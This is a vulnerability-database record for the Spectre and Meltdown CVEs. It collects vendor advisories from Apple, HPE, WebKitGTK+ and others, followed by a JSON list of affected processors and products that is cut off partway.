Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O OR+iGnoY+cALbsBWKwbmzQM= =V4ow -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

APPLE-SA-2018-1-8-1 iOS 11.2.2

iOS 11.2.2 is now available and and addresses the following:

Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Description: iOS 11.2.2 includes security improvements to Safari and WebKit to mitigate the effects of Spectre (CVE-2017-5753 and CVE-2017-5715). Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/

iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.

The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.

To check that the iPhone, iPod touch, or iPad has been updated:

  • Navigate to Settings
  • Select General
  • Select About.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03805en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbhf03805en_us Version: 7

HPESBHF03805 rev.7 - Certain HPE products using Microprocessors from Intel, AMD, and ARM, with Speculative Execution, Elevation of Privilege and Information Disclosure.

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2018-01-23 Last Updated: 2018-01-22

Potential Security Impact: Local: Disclosure of Information, Elevation of Privilege

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY On January 3 2018, side-channel security vulnerabilities involving speculative execution were publicly disclosed. These vulnerabilities may impact the listed HPE products, potentially leading to information disclosure and elevation of privilege. Mitigation and resolution of these vulnerabilities may call for both an operating system update, provided by the OS vendor, and a system ROM update from HPE.

Note:

References:

  • CVE-2017-5715 - aka Spectre, branch target injection
  • CVE-2017-5753 - aka Spectre, bounds check bypass
  • CVE-2017-5754 - aka Meltdown, rogue data cache load, memory access permission check performed after kernel memory read

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  • HPE ProLiant DL380 Gen10 Server - To be delivered
  • HPE ProLiant DL180 Gen10 Server - To be delivered
  • HPE ProLiant DL160 Gen10 Server - To be delivered
  • HPE ProLiant DL360 Gen10 Server - To be delivered
  • HPE ProLiant ML110 Gen10 Server - To be delivered
  • HPE ProLiant DL580 Gen10 Server - To be delivered
  • HPE ProLiant DL560 Gen10 Server - To be delivered
  • HPE ProLiant DL120 Gen10 Server - To be delivered
  • HPE ProLiant ML350 Gen10 Server - To be delivered
  • HPE ProLiant XL450 Gen10 Server - To be delivered
  • HPE Synergy 660 Gen10 Compute Module - To be delivered
  • HPE ProLiant DL385 Gen10 Server - prior to v1.04
  • HPE ProLiant XL170r Gen10 Server - To be delivered
  • HPE ProLiant BL460c Gen10 Server Blade - To be delivered
  • HPE ProLiant XL190r Gen10 Server - To be delivered
  • HPE ProLiant XL230k Gen10 Server - To be delivered
  • HPE Synergy 480 Gen10 Compute Module - To be delivered
  • HPE ProLiant XL730f Gen9 Server - To be delivered
  • HPE ProLiant XL230a Gen9 Server - To be delivered
  • HPE ProLiant XL740f Gen9 Server - To be delivered
  • HPE ProLiant XL750f Gen9 Server - To be delivered
  • HPE ProLiant XL170r Gen9 Server - To be delivered
  • HP ProLiant DL60 Gen9 Server - To be delivered
  • HP ProLiant DL160 Gen9 Server - To be delivered
  • HPE ProLiant DL360 Gen9 Server - To be delivered
  • HP ProLiant DL380 Gen9 Server - To be delivered
  • HPE ProLiant XL450 Gen9 Server - To be delivered
  • HPE Apollo 4200 Gen9 Server - To be delivered
  • HP ProLiant BL460c Gen9 Server Blade - To be delivered
  • HP ProLiant ML110 Gen9 Server - To be delivered
  • HP ProLiant ML150 Gen9 Server - To be delivered
  • HPE ProLiant ML350 Gen9 Server - To be delivered
  • HP ProLiant DL120 Gen9 Server - To be delivered
  • HPE ProLiant DL560 Gen9 Server - To be delivered
  • HP ProLiant BL660c Gen9 Server - To be delivered
  • HPE ProLiant ML30 Gen9 Server - To be delivered
  • HPE ProLiant XL170r Gen10 Server - To be delivered
  • HPE ProLiant DL20 Gen9 Server - To be delivered
  • HPE Synergy 660 Gen9 Compute Module - To be delivered
  • HPE Synergy 480 Gen9 Compute Module - To be delivered
  • HPE ProLiant XL250a Gen9 Server - To be delivered
  • HPE ProLiant XL190r Gen9 Server - To be delivered
  • HP ProLiant DL80 Gen9 Server - To be delivered
  • HPE ProLiant DL180 Gen9 Server - To be delivered
  • HPE ProLiant XL270d Gen9 Accelerator Tray 2U Configure-to-order Server - To be delivered
  • HPE ProLiant WS460c Gen9 Workstation - To be delivered
  • HPE ProLiant XL260a Gen9 Server - To be delivered
  • HPE Synergy 620 Gen9 Compute Module - To be delivered
  • HPE ProLiant DL580 Gen9 Server - To be delivered
  • HP ProLiant XL220a Gen8 v2 Server - To be delivered
  • HPE Synergy 680 Gen9 Compute Module - To be delivered
  • HPE ProLiant m510 Server Cartridge - To be delivered
  • HPE ProLiant m710p Server Cartridge - To be delivered
  • HPE ProLiant m710x Server Cartridge - To be delivered
  • HP ProLiant m710 Server Cartridge - To be delivered
  • HP ProLiant DL980 G7 Server - To be delivered
  • HPE Synergy Composer - To be delivered
  • HPE ProLiant Thin Micro TM200 Server - To be delivered
  • HPE ProLiant ML10 v2 Server - To be delivered
  • HPE ProLiant m350 Server Cartridge - To be delivered
  • HPE ProLiant m300 Server Cartridge - To be delivered
  • HPE ProLiant MicroServer Gen8 - To be delivered
  • HPE ProLiant ML310e Gen8 v2 Server - To be delivered
  • HPE Superdome Flex Server - To be delivered
  • HP 3PAR StoreServ File Controller - To be delivered - v3 impacted
  • HPE StoreVirtual 3000 File Controller - To be delivered
  • HPE StoreEasy 1450 Storage - To be delivered
  • HPE StoreEasy 1550 Storage - To be delivered
  • HPE StoreEasy 1650 Storage - To be delivered
  • HPE StoreEasy 3850 Gateway Storage - To be delivered
  • HPE StoreEasy 1850 Storage - To be delivered
  • HP ConvergedSystem 700 - To be delivered
  • HPE Converged Architecture 700 - To be delivered
  • HP ProLiant DL580 Gen8 Server - To be delivered
  • HPE Cloudline CL2100 Gen10 Server - To be delivered
  • HPE Cloudline CL2200 Gen10 Server - To be delivered
  • HPE Cloudline CL3150 G4 Server - To be delivered
  • HPE Cloudline CL5200 G3 Server - To be delivered
  • HPE Cloudline CL3100 G3 Server - To be delivered
  • HPE Cloudline CL2100 G3 807S 8 SFF Configure-to-order Server - To be delivered
  • HPE Cloudline CL2100 G3 407S 4 LFF Configure-to-order Server - To be delivered
  • HPE Cloudline CL2100 G3 806R 8SFF Configure-to-order Server - To be delivered
  • HPE Cloudline CL2200 G3 1211R 12 LFF Configure-to-order Server - To be delivered

BACKGROUND

CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2017-5715
  8.2 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
  6.8 (AV:A/AC:L/Au:N/C:C/I:P/A:N)

CVE-2017-5753
  5.0 CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L
  5.4 (AV:A/AC:M/Au:N/C:P/I:P/A:P)

CVE-2017-5754
  7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

On January 11, Intel announced issues with an increased frequency of reboots when using the microcodes they released to address Variant 2 of the Spectre Vulnerability for numerous processors including Broadwell, Haswell, Skylake, Kaby Lake, Ivybridge, and Sandybridge processors. Intel has now identified the root cause of these issues and determined that these microcodes may introduce reboots and other unpredictable system behavior. Due to the severity of the potential issues that may occur when using these microcodes, Intel is now recommending that customers discontinue their use. Additional information is available from Intels Security Exploit Newsroom here: https://newsroom.intel.com/press-kits/security-exploits-intel-products/ . HPE is in alignment with Intel in our recommendation that customers discontinue use of System ROMs including impacted microcodes and revert to earlier System ROM versions.

All System ROMs including impacted microcodes have been removed from the HPE Support Site. This impacts HPE ProLiant and Synergy Gen10, Gen9, and Gen8 v2 servers as well as HPE Superdome servers for which updated System ROMs had previously been made available. Intel is working on updated microcodes to address these issues, and HPE will validate updated System ROMs including these microcodes and make them available to our customers in the coming weeks.

Mitigations for Variant 1 (Spectre) and Variant 3 (Meltdown) vulnerabilities require only OS updates and are not impacted.

  • HPE has provided a customer bulletin https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00039267en_us with specific instructions to obtain the udpated sytem ROM

  • Note:

    • CVE-2017-5715 (Variant 2) requires that the System ROM be updated and a vendor supplied operating system update be applied as well.
    • For CVE-2017-5753, CVE-2017-5754 (Variants 1 and 3) require only updates of a vendor supplied operating system.
    • HPE will continue to add additional products to the list.

HISTORY

Version:1 (rev.1) - 4 January 2018 Initial release

Version:2 (rev.2) - 5 January 2018 Added additional impacted products

Version:3 (rev.3) - 10 January 2018 Added more impacted products

Version:4 (rev.4) - 9 January 2018 Fixed product ID

Version:5 (rev.5) - 18 January 2018 Added additional impacted products

Version:6 (rev.6) - 19 January 2018 updated impacted product list

Version:7 (rev.7) - 23 January 2018 Marked impacted products with TBD for System ROM updates per Intel's guidance on microcode issues

Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

Several vulnerabilities were discovered in WebKitGTK+.

CVE-2017-5753 Versions affected: WebKitGTK+ before 2.18.5. Credit to Jann Horn of Google Project Zero; and Paul Kocher in collaboration with Daniel Genkin of University of Pennsylvania and University of Maryland, Daniel Gruss of Graz University of Technology, Werner Haas of Cyberus Technology, Mike Hamburg of Rambus (Cryptography Research Division), Moritz Lipp of Graz University of Technology, Stefan Mangard of Graz University of Technology, Thomas Prescher of Cyberus Technology, Michael Schwarz of Graz University of Technology, and Yuval Yarom of University of Adelaide and Data61. Description: Security improvements are included to mitigate the effects.

CVE-2017-5715 Versions affected: WebKitGTK+ before 2.18.5. Credit to Jann Horn of Google Project Zero; and Paul Kocher in collaboration with Daniel Genkin of University of Pennsylvania and University of Maryland, Daniel Gruss of Graz University of Technology, Werner Haas of Cyberus Technology, Mike Hamburg of Rambus (Cryptography Research Division), Moritz Lipp of Graz University of Technology, Stefan Mangard of Graz University of Technology, Thomas Prescher of Cyberus Technology, Michael Schwarz of Graz University of Technology, and Yuval Yarom of University of Adelaide and Data61. Description: Security improvements are included to mitigate the effects.

We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases.

Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html

The WebKitGTK+ team, January 10, 2018

. 7.2) - noarch, x86_64

3

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201801-1712",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "oracle",
        "version": "11.3"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "vmware",
        "version": "6.5"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5287u"
      },
      {
        "model": "xeon e5 2470 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5540"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2655le"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880l_v3"
      },
      {
        "model": "xeon e3 1270 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4669_v4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350u"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e6510"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2435m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "875k"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5503"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6148"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4980hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360"
      },
      {
        "model": "xeon e5 1660 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3850"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5687"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2617m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5509"
      },
      {
        "model": "xeon e3 1260l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "670"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4422e"
      },
      {
        "model": "cortex-a15",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "bl bpc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "cortex-a72",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2718"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1585l_v5"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3230m"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5518"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4005"
      },
      {
        "model": "cortex-a75",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3317u"
      },
      {
        "model": "xeon e3 1226 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1241 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699_v4"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1535m_v5"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4900mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3380m"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330m"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867l"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v3"
      },
      {
        "model": "linux enterprise software development kit",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "xeon e-1105c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4012y"
      },
      {
        "model": "xeon e5 1650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "el ppc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670r"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7250"
      },
      {
        "model": "vl2 ppc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "bl bpc 7001",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4722hq"
      },
      {
        "model": "xeon e3 1501m v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y30"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790t"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v4"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v4"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6154"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220"
      },
      {
        "model": "xeon e5 2448l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2312m"
      },
      {
        "model": "xeon e3 1285l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4655_v4"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8180"
      },
      {
        "model": "vl2 ppc7 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300t"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3405"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3350"
      },
      {
        "model": "xeon e3 1230 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "vl2 ppc 9000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v3"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5638"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1750"
      },
      {
        "model": "xeon e5 2403",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6350hq"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6146"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570r"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5550"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6140"
      },
      {
        "model": "vl2 bpc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3350p"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5630"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6136"
      },
      {
        "model": "cortex-a17",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4120u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w5580"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "820qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2640m"
      },
      {
        "model": "xeon e3 1280 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3680"
      },
      {
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y30"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2850"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2338"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5122"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4809_v3"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4160"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4657l_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4158u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4960hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5750hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640um"
      },
      {
        "model": "xeon e3 1230 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v3"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4627_v4"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l7555"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3667u"
      },
      {
        "model": "core i5",
        "scope": "eq",
